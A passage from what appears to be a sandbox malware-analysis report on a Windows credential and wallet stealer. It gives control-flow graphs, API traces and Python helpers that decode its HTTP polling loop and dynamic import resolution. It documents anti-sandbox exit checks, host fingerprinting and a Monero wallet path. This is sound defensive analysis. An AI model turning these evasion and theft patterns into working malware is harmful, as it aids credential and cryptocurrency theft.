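        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append({"api": m.group("api"), "module": m.group("mod"),
                      "args": args, "ref": int(m.group("ref"), 16)})
    return calls


def summarize_resolution(calls):
    """Group GetProcAddress calls by module handle and flag names passed in clear."""
    per_handle = Counter()
    plaintext = []
    loads = 0
    first_load_ref = None
    for c in calls:
        if c["api"] == "LoadLibraryA":
            loads += 1
            first_load_ref = first_load_ref or c["ref"]
        elif c["api"] == "GetProcAddress" and len(c["args"]) >= 2:
            handle, name = c["args"][0], c["args"][1]
            per_handle[handle] += 1
            # A name that is neither an 8-digit hex pointer nor "?" was readable
            # in memory when the call was made.
            if name != "?" and not POINTER_RE.match(name):
                plaintext.append((handle, name))
    # Handles used before the first LoadLibraryA belong to modules that were
    # already mapped; how the sample obtained them is not visible in the trace.
    preloaded = sorted({c["args"][0] for c in calls
                        if c["api"] == "GetProcAddress" and c["args"]
                        and (first_load_ref is None or c["ref"] < first_load_ref)})
    return {
        "loadlibrary_calls": loads,
        "getprocaddress_calls": sum(per_handle.values()),
        "per_handle": dict(per_handle),
        "plaintext_names": plaintext,
        "handles_used_before_first_load": preloaded,
    }


if __name__ == "__main__":
    s = summarize_resolution(parse_trace(RESOLVER_TRACE))
    print(f"LoadLibraryA: {s['loadlibrary_calls']}, GetProcAddress: {s['getprocaddress_calls']}")
    for handle, n in sorted(s["per_handle"].items(), key=lambda kv: -kv[1]):
        print(f"  handle {handle}: {n} exports resolved")
    print("names in clear:", s["plaintext_names"])
    print("handles used before any LoadLibraryA:", s["handles_used_before_first_load"])
```

Because the names are resolved this way, the import table of the unpacked image says little about what the sample can do; the per-handle counts from the trace are the better inventory, and a single function issuing over a hundred GetProcAddress calls is itself a usable characteristic when hunting across reports.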

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1033 eb6280-eb630b call eca7a0 call eb47b0 call eca740 InternetOpenA StrCmpCA 1040 eb630d 1033->1040 1041 eb6314-eb6318 1033->1041 1040->1041 1042 eb6509-eb6525 call eca7a0 call eca800 * 2 1041->1042 1043 eb631e-eb6342 InternetConnectA 1041->1043 1061 eb6528-eb652d 1042->1061 1044 eb6348-eb634c 1043->1044 1045 eb64ff-eb6503 InternetCloseHandle 1043->1045 1047 eb635a 1044->1047 1048 eb634e-eb6358 1044->1048 1045->1042 1051 eb6364-eb6392 HttpOpenRequestA 1047->1051 1048->1051 1053 eb6398-eb639c 1051->1053 1054 eb64f5-eb64f9 InternetCloseHandle 1051->1054 1056 eb639e-eb63bf InternetSetOptionA 1053->1056 1057 eb63c5-eb6405 HttpSendRequestA HttpQueryInfoA 1053->1057 1054->1045 1056->1057 1059 eb642c-eb644b call ec8940 1057->1059 1060 eb6407-eb6427 call eca740 call eca800 * 2 1057->1060 1067 eb64c9-eb64e9 call eca740 call eca800 * 2 1059->1067 1068 eb644d-eb6454 1059->1068 1060->1061 1067->1061 1071 eb64c7-eb64ef InternetCloseHandle 1068->1071 1072 eb6456-eb6480 InternetReadFile 1068->1072 1071->1054 1076 eb648b 1072->1076 1077 eb6482-eb6489 1072->1077 1076->1071 1077->1076 1080 eb648d-eb64c5 call eca9b0 call eca8a0 call eca800 1077->1080 1080->1072
                            APIs
                              • Part of subcall function 00ECA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ECA7E6
                              • Part of subcall function 00EB47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EB4839
                              • Part of subcall function 00EB47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00EB4849
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                            • InternetOpenA.WININET(00ED0DFE,00000001,00000000,00000000,00000000), ref: 00EB62E1
                            • StrCmpCA.SHLWAPI(?,00A9E3D0), ref: 00EB6303
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EB6335
                            • HttpOpenRequestA.WININET(00000000,GET,?,00A9DC50,00000000,00000000,00400100,00000000), ref: 00EB6385
                            • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00EB63BF
                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EB63D1
                            • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00EB63FD
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00EB646D
                            • InternetCloseHandle.WININET(00000000), ref: 00EB64EF
                            • InternetCloseHandle.WININET(00000000), ref: 00EB64F9
                            • InternetCloseHandle.WININET(00000000), ref: 00EB6503
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                            • String ID: ERROR$ERROR$GET
                            • API String ID: 3749127164-2509457195
                            • Opcode ID: 3ceaf0351ce2f506f52c8bbc7958d9e9bba5e8df7fb9de0855afd1ef29a863b3
                            • Instruction ID: 21e77dc77537cc5654abdf4576809aa2c3608c4609afa562343c0c74dfd36d47
                            • Opcode Fuzzy Hash: 3ceaf0351ce2f506f52c8bbc7958d9e9bba5e8df7fb9de0855afd1ef29a863b3
                            • Instruction Fuzzy Hash: 8B716C71A00218EBDB24DFA0CC49FEE77B4BB44704F1090A9F10A7B584DBB96A86CF51

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1090 ec5510-ec5577 call ec5ad0 call eca820 * 3 call eca740 * 4 1106 ec557c-ec5583 1090->1106 1107 ec5585-ec55b6 call eca820 call eca7a0 call eb1590 call ec51f0 1106->1107 1108 ec55d7-ec564c call eca740 * 2 call eb1590 call ec52c0 call eca8a0 call eca800 call ecaad0 StrCmpCA 1106->1108 1123 ec55bb-ec55d2 call eca8a0 call eca800 1107->1123 1134 ec5693-ec56a9 call ecaad0 StrCmpCA 1108->1134 1138 ec564e-ec568e call eca7a0 call eb1590 call ec51f0 call eca8a0 call eca800 1108->1138 1123->1134 1139 ec57dc-ec5844 call eca8a0 call eca820 * 2 call eb1670 call eca800 * 4 call ec6560 call eb1550 1134->1139 1140 ec56af-ec56b6 1134->1140 1138->1134 1269 ec5ac3-ec5ac6 1139->1269 1142 ec56bc-ec56c3 1140->1142 1143 ec57da-ec585f call ecaad0 StrCmpCA 1140->1143 1146 ec571e-ec5793 call eca740 * 2 call eb1590 call ec52c0 call eca8a0 call eca800 call ecaad0 StrCmpCA 1142->1146 1147 ec56c5-ec5719 call eca820 call eca7a0 call eb1590 call ec51f0 call eca8a0 call eca800 1142->1147 1162 ec5865-ec586c 1143->1162 1163 ec5991-ec59f9 call eca8a0 call eca820 * 2 call eb1670 call eca800 * 4 call ec6560 call eb1550 1143->1163 1146->1143 1246 ec5795-ec57d5 call eca7a0 call eb1590 call ec51f0 call eca8a0 call eca800 1146->1246 1147->1143 1168 ec598f-ec5a14 call ecaad0 StrCmpCA 1162->1168 1169 ec5872-ec5879 1162->1169 1163->1269 1198 ec5a28-ec5a91 call eca8a0 call eca820 * 2 call eb1670 call eca800 * 4 call ec6560 call eb1550 1168->1198 1199 ec5a16-ec5a21 Sleep 1168->1199 1175 ec587b-ec58ce call eca820 call eca7a0 call eb1590 call ec51f0 call eca8a0 call eca800 1169->1175 1176 ec58d3-ec5948 call eca740 * 2 call eb1590 call ec52c0 call eca8a0 call eca800 call ecaad0 StrCmpCA 1169->1176 1175->1168 1176->1168 1274 ec594a-ec598a call eca7a0 call eb1590 call ec51f0 call eca8a0 call eca800 1176->1274 1198->1269 1199->1106 1246->1143 1274->1168
                            APIs
                              • Part of subcall function 00ECA820: lstrlen.KERNEL32(00EB4F05,?,?,00EB4F05,00ED0DDE), ref: 00ECA82B
                              • Part of subcall function 00ECA820: lstrcpy.KERNEL32(00ED0DDE,00000000), ref: 00ECA885
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00EC5644
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00EC56A1
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00EC5857
                              • Part of subcall function 00ECA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ECA7E6
                              • Part of subcall function 00EC51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00EC5228
                              • Part of subcall function 00ECA8A0: lstrcpy.KERNEL32(?,00ED0E17), ref: 00ECA905
                              • Part of subcall function 00EC52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00EC5318
                              • Part of subcall function 00EC52C0: lstrlen.KERNEL32(00000000), ref: 00EC532F
                              • Part of subcall function 00EC52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00EC5364
                              • Part of subcall function 00EC52C0: lstrlen.KERNEL32(00000000), ref: 00EC5383
                              • Part of subcall function 00EC52C0: lstrlen.KERNEL32(00000000), ref: 00EC53AE
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00EC578B
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00EC5940
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00EC5A0C
                            • Sleep.KERNEL32(0000EA60), ref: 00EC5A1B
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen$Sleep
                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                            • API String ID: 507064821-2791005934
                            • Opcode ID: 96c550298f646c83aba913a5cfc656e6d8c03703fe293699a8df251c443a2901
                            • Instruction ID: 9cc01ae8f2d58dc3783b8a838396815594b8ca0b5afbbd2823742060bed08bf6
                            • Opcode Fuzzy Hash: 96c550298f646c83aba913a5cfc656e6d8c03703fe293699a8df251c443a2901
                            • Instruction Fuzzy Hash: A2E143739101089BCB18FB60DA5BFED73B8AB54304F44916DB40673585EF366A4BCBA2
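Read together, the downloader at 0x00EB6280 and the polling loop at 0x00EC5510 above describe a plain HTTP GET whose status code is checked with HttpQueryInfoA, whose body is read in 0x7CF-byte chunks, and which the loop retries after Sleep(0xEA60) while the result still compares equal to "ERROR" (six StrCmpCA calls against that string). The report prints the numeric arguments raw. The Python below is an added example, not from the report or the sample: it maps those arguments to their wininet.h names. The constant tables hold only the values needed to read this trace, and the trace it runs on is a constructed copy of the lines above with the subcall lines left out. The 4-byte buffer handed to InternetSetOptionA is shown as "?" in the trace, so the script reports only that INTERNET_OPTION_SECURITY_FLAGS is being set, not which security flags.

```python
import re

# Joe Sandbox prints each traced call as "Api.MODULE(arg,arg,...), ref: ADDR";
# only the API name and its argument list are needed here.
CALL_RE = re.compile(r"(\w+)\.\w+\(([^)]*)\)")

# Constructed copy of the downloader trace (0x00EB6280) plus the Sleep from the
# polling loop (0x00EC5510); the "Part of subcall" lines are left out.
TRACE = """\
InternetOpenA.WININET(00ED0DFE,00000001,00000000,00000000,00000000), ref: 00EB62E1
StrCmpCA.SHLWAPI(?,00A9E3D0), ref: 00EB6303
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EB6335
HttpOpenRequestA.WININET(00000000,GET,?,00A9DC50,00000000,00000000,00400100,00000000), ref: 00EB6385
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00EB63BF
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EB63D1
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00EB63FD
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00EB646D
InternetCloseHandle.WININET(00000000), ref: 00EB64EF
Sleep.KERNEL32(0000EA60), ref: 00EC5A1B
"""

# Values from wininet.h, limited to what this trace needs.
OPEN_TYPE = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT",
             3: "INTERNET_OPEN_TYPE_PROXY"}
SERVICE = {1: "INTERNET_SERVICE_FTP", 2: "INTERNET_SERVICE_GOPHER", 3: "INTERNET_SERVICE_HTTP"}
REQUEST_FLAGS = {
    0x80000000: "INTERNET_FLAG_RELOAD",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT",
    0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
    0x00000200: "INTERNET_FLAG_NO_UI",
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}
OPTIONS = {2: "INTERNET_OPTION_CONNECT_TIMEOUT", 5: "INTERNET_OPTION_SEND_TIMEOUT",
           6: "INTERNET_OPTION_RECEIVE_TIMEOUT", 31: "INTERNET_OPTION_SECURITY_FLAGS"}
QUERY = {5: "HTTP_QUERY_CONTENT_LENGTH", 19: "HTTP_QUERY_STATUS_CODE"}


def parse_calls(text):
    """(api, [args...]) per call, in report order."""
    return [(api, [a.strip() for a in args.split(",")])
            for api, args in CALL_RE.findall(text)]


def intarg(args, i):
    """Argument i as an integer, or None when the tracer printed '?' or a string."""
    try:
        return int(args[i], 16)
    except (IndexError, ValueError):
        return None


def decode_bits(value, table):
    """Named flags set in value, highest bit first; leftover bits reported raw."""
    names = [name for bit, name in sorted(table.items(), reverse=True) if value & bit]
    rest = value & ~sum(table)
    if rest:
        names.append(f"0x{rest:08X} (not in table)")
    return names


def decode_call(api, args):
    """Replace the raw integers of one call with their wininet.h names."""
    if api == "InternetOpenA":
        v = intarg(args, 1)
        return {"access_type": OPEN_TYPE.get(v, v)}
    if api == "InternetConnectA":
        v = intarg(args, 5)
        return {"service": SERVICE.get(v, v)}
    if api == "HttpOpenRequestA":
        return {"verb": args[1], "flags": decode_bits(intarg(args, 6) or 0, REQUEST_FLAGS)}
    if api == "InternetSetOptionA":
        v = intarg(args, 1)
        # The option buffer itself is "?" in the trace, so the flags written
        # into it are unknown; only the option id and buffer length are decoded.
        return {"option": OPTIONS.get(v, v), "buffer_len": intarg(args, 3)}
    if api == "HttpQueryInfoA":
        v = intarg(args, 1)
        return {"info_level": QUERY.get(v, v)}
    if api == "InternetReadFile":
        return {"chunk_bytes": intarg(args, 2)}
    if api == "Sleep":
        ms = intarg(args, 0)
        return {"milliseconds": ms, "seconds": None if ms is None else ms / 1000}
    return {}


def decode_trace(text):
    """Decoded view of every call that has something to decode."""
    out = []
    for api, args in parse_calls(text):
        info = decode_call(api, args)
        if info:
            out.append((api, info))
    return out


if __name__ == "__main__":
    for api, info in decode_trace(TRACE):
        print(f"{api:20s} {info}")
```

Decoded, the sequence is: a direct (non-proxied) session, INTERNET_SERVICE_HTTP to the server and port taken from the InternetCrackUrlA subcall, a GET opened with INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_PRAGMA_NOCACHE, security flags set on the request before it is sent, the status code read back, the body pulled in 1999-byte reads, and a 60-second pause before the loop tries again.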

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1301 ec17a0-ec17cd call ecaad0 StrCmpCA 1304 ec17cf-ec17d1 ExitProcess 1301->1304 1305 ec17d7-ec17f1 call ecaad0 1301->1305 1309 ec17f4-ec17f8 1305->1309 1310 ec17fe-ec1811 1309->1310 1311 ec19c2-ec19cd call eca800 1309->1311 1313 ec199e-ec19bd 1310->1313 1314 ec1817-ec181a 1310->1314 1313->1309 1316 ec18ad-ec18be StrCmpCA 1314->1316 1317 ec18cf-ec18e0 StrCmpCA 1314->1317 1318 ec198f-ec1999 call eca820 1314->1318 1319 ec1849-ec1858 call eca820 1314->1319 1320 ec1821-ec1830 call eca820 1314->1320 1321 ec185d-ec186e StrCmpCA 1314->1321 1322 ec187f-ec1890 StrCmpCA 1314->1322 1323 ec1835-ec1844 call eca820 1314->1323 1324 ec1970-ec1981 StrCmpCA 1314->1324 1325 ec18f1-ec1902 StrCmpCA 1314->1325 1326 ec1951-ec1962 StrCmpCA 1314->1326 1327 ec1932-ec1943 StrCmpCA 1314->1327 1328 ec1913-ec1924 StrCmpCA 1314->1328 1348 ec18ca 1316->1348 1349 ec18c0-ec18c3 1316->1349 1350 ec18ec 1317->1350 1351 ec18e2-ec18e5 1317->1351 1318->1313 1319->1313 1320->1313 1344 ec187a 1321->1344 1345 ec1870-ec1873 1321->1345 1346 ec189e-ec18a1 1322->1346 1347 ec1892-ec189c 1322->1347 1323->1313 1338 ec198d 1324->1338 1339 ec1983-ec1986 1324->1339 1329 ec190e 1325->1329 1330 ec1904-ec1907 1325->1330 1335 ec196e 1326->1335 1336 ec1964-ec1967 1326->1336 1333 ec194f 1327->1333 1334 ec1945-ec1948 1327->1334 1331 ec1926-ec1929 1328->1331 1332 ec1930 1328->1332 1329->1313 1330->1329 1331->1332 1332->1313 1333->1313 1334->1333 1335->1313 1336->1335 1338->1313 1339->1338 1344->1313 1345->1344 1355 ec18a8 1346->1355 1347->1355 1348->1313 1349->1348 1350->1313 1351->1350 1355->1313
                            APIs
                            • StrCmpCA.SHLWAPI(00000000,block), ref: 00EC17C5
                            • ExitProcess.KERNEL32 ref: 00EC17D1
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID: block
                            • API String ID: 621844428-2199623458
                            • Opcode ID: 0a766cbfb1c80ad8dbb4f49424734647cf1dd8a979292addf905186dc6d90406
                            • Instruction ID: fc3a0981b12dbe5e0b60e0a23ee45d9517273774cf1e9ffcfe584d191cb9059b
                            • Opcode Fuzzy Hash: 0a766cbfb1c80ad8dbb4f49424734647cf1dd8a979292addf905186dc6d90406
                            • Instruction Fuzzy Hash: 135178B5A04209EBCB04DFA0CA55FBE77B5AF89704F10A08DE40AB7341D776A943CB61

                            Control-flow Graph

                            control_flow_graph 1356 ec7500-ec754a GetWindowsDirectoryA 1357 ec754c 1356->1357 1358 ec7553-ec75c7 GetVolumeInformationA call ec8d00 * 3 1356->1358 1357->1358 1365 ec75d8-ec75df 1358->1365 1366 ec75fc-ec7617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 ec75e1-ec75fa call ec8d00 1365->1367 1369 ec7628-ec7658 wsprintfA call eca740 1366->1369 1370 ec7619-ec7626 call eca740 1366->1370 1367->1365 1377 ec767e-ec768e 1369->1377 1370->1377
                            APIs
                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00EC7542
                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00EC757F
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EC7603
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00EC760A
                            • wsprintfA.USER32 ref: 00EC7640
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                            • String ID: :$C$\$
                            • API String ID: 1544550907-3109660283
                            • Opcode ID: 24e74eae9c985090469d2ffe213209f0464bab58df235240325b41b64d2aede5
                            • Instruction ID: 13813f9443c7b1c187f3d60d45d826c6a7871795ed3cf557649a94eec07af333
                            • Opcode Fuzzy Hash: 24e74eae9c985090469d2ffe213209f0464bab58df235240325b41b64d2aede5
                            • Instruction Fuzzy Hash: 2F418FB1E04248EBDB10DB94DE45FEEBBB8AB08704F10019DF54977280D77A6A45CFA5

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00EC9860: GetProcAddress.KERNEL32(76F70000,00A90660), ref: 00EC98A1
                              • Part of subcall function 00EC9860: GetProcAddress.KERNEL32(76F70000,00A907E0), ref: 00EC98BA
                              • Part of subcall function 00EC9860: GetProcAddress.KERNEL32(76F70000,00A906A8), ref: 00EC98D2
                              • Part of subcall function 00EC9860: GetProcAddress.KERNEL32(76F70000,00A907C8), ref: 00EC98EA
                              • Part of subcall function 00EC9860: GetProcAddress.KERNEL32(76F70000,00A90768), ref: 00EC9903
                              • Part of subcall function 00EC9860: GetProcAddress.KERNEL32(76F70000,00A98B28), ref: 00EC991B
                              • Part of subcall function 00EC9860: GetProcAddress.KERNEL32(76F70000,00A86240), ref: 00EC9933
                              • Part of subcall function 00EC9860: GetProcAddress.KERNEL32(76F70000,00A861E0), ref: 00EC994C
                              • Part of subcall function 00EC9860: GetProcAddress.KERNEL32(76F70000,00A906D8), ref: 00EC9964
                              • Part of subcall function 00EC9860: GetProcAddress.KERNEL32(76F70000,00A90570), ref: 00EC997C
                              • Part of subcall function 00EC9860: GetProcAddress.KERNEL32(76F70000,00A90588), ref: 00EC9995
                              • Part of subcall function 00EC9860: GetProcAddress.KERNEL32(76F70000,00A906F0), ref: 00EC99AD
                              • Part of subcall function 00EC9860: GetProcAddress.KERNEL32(76F70000,00A86480), ref: 00EC99C5
                              • Part of subcall function 00EC9860: GetProcAddress.KERNEL32(76F70000,00A90708), ref: 00EC99DE
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                              • Part of subcall function 00EB11D0: ExitProcess.KERNEL32 ref: 00EB1211
                              • Part of subcall function 00EB1160: GetSystemInfo.KERNEL32(?), ref: 00EB116A
                              • Part of subcall function 00EB1160: ExitProcess.KERNEL32 ref: 00EB117E
                              • Part of subcall function 00EB1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00EB112B
                              • Part of subcall function 00EB1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00EB1132
                              • Part of subcall function 00EB1110: ExitProcess.KERNEL32 ref: 00EB1143
                              • Part of subcall function 00EB1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00EB123E
                              • Part of subcall function 00EB1220: __aulldiv.LIBCMT ref: 00EB1258
                              • Part of subcall function 00EB1220: __aulldiv.LIBCMT ref: 00EB1266
                              • Part of subcall function 00EB1220: ExitProcess.KERNEL32 ref: 00EB1294
                              • Part of subcall function 00EC6770: GetUserDefaultLangID.KERNEL32 ref: 00EC6774
                              • Part of subcall function 00EB1190: ExitProcess.KERNEL32 ref: 00EB11C6
                              • Part of subcall function 00EC7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00EB11B7), ref: 00EC7880
                              • Part of subcall function 00EC7850: RtlAllocateHeap.NTDLL(00000000), ref: 00EC7887
                              • Part of subcall function 00EC7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00EC789F
                              • Part of subcall function 00EC78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EC7910
                              • Part of subcall function 00EC78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00EC7917
                              • Part of subcall function 00EC78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00EC792F
                              • Part of subcall function 00ECA9B0: lstrlen.KERNEL32(?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00ECA9C5
                              • Part of subcall function 00ECA9B0: lstrcpy.KERNEL32(00000000), ref: 00ECAA04
                              • Part of subcall function 00ECA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ECAA12
                              • Part of subcall function 00ECA8A0: lstrcpy.KERNEL32(?,00ED0E17), ref: 00ECA905
                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00A98AC8,?,00ED110C,?,00000000,?,00ED1110,?,00000000,00ED0AEF), ref: 00EC6ACA
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00EC6AE8
                            • CloseHandle.KERNEL32(00000000), ref: 00EC6AF9
                            • Sleep.KERNEL32(00001770), ref: 00EC6B04
                            • CloseHandle.KERNEL32(?,00000000,?,00A98AC8,?,00ED110C,?,00000000,?,00ED1110,?,00000000,00ED0AEF), ref: 00EC6B1A
                            • ExitProcess.KERNEL32 ref: 00EC6B22
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                            • String ID:
                            • API String ID: 2525456742-0
                            • Opcode ID: a21fccf02dae848b3369d95463e94c5cad8e0aa62fb007911b72e11e7a4a7b25
                            • Instruction ID: 9a5b8b89512b6e8ff77ab3ad7265de6f53b491e0a528f2ddbd3f8b10c6014404
                            • Opcode Fuzzy Hash: a21fccf02dae848b3369d95463e94c5cad8e0aa62fb007911b72e11e7a4a7b25
                            • Instruction Fuzzy Hash: 59310E71900208AADB14F7A0E957FEE77B8AF44344F44652CF152B2181DF766906C7A6

                            Control-flow Graph

                            control_flow_graph 1436 eb1220-eb1247 call ec89b0 GlobalMemoryStatusEx 1439 eb1249-eb1271 call ecda00 * 2 1436->1439 1440 eb1273-eb127a 1436->1440 1442 eb1281-eb1285 1439->1442 1440->1442 1444 eb129a-eb129d 1442->1444 1445 eb1287 1442->1445 1447 eb1289-eb1290 1445->1447 1448 eb1292-eb1294 ExitProcess 1445->1448 1447->1444 1447->1448
                            APIs
                            • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00EB123E
                            • __aulldiv.LIBCMT ref: 00EB1258
                            • __aulldiv.LIBCMT ref: 00EB1266
                            • ExitProcess.KERNEL32 ref: 00EB1294
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
